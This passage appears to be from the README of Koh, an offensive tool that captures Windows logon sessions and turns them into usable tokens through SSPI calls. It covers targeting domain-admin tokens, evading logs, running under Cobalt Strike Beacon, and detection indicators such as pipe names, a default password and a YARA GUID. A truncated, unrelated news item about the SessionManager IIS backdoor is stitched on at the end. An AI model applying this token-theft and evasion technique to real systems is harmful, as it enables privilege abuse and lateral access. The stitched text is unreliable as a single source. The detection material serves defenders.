Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege, however this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're not presented with another problem: given a "leaked"/held open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.

Advantages/Disadvantages Versus Traditional Credential Extraction


  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.


  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, and existing ticket/credential extraction can still be done on the leaked logon session.
  • May cause instability if a large number of sessions are leaked (though this can be mitigated with token group SID filtering) and restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time. This is one of the weirder and frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails Β―\_(ツ)_/Β―

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle works in this context, but the result errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.


To quote @tifkin_ "Everything is stealthy until someone is looking for it." While Koh's approach is slightly different than others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts is opens up a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is password, so sending password list to any \\.\pipe\imposecost pipe will let you confirm if Koh is indeed running. The default impersonation pipe used is \\.pipe\imposingcost.

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is performed to perform a getsystem type elevation.

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking of some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions or the specific AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext, specifically using a LUID in AcquireCredentialsHandle) could be explored for effectiveness, but alas, I am not an EDR.


  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug

New 'SessionManager' Backdoor Targeting Microsoft IIS Servers in the Wild

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022. DubbedΒ SessionManager, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after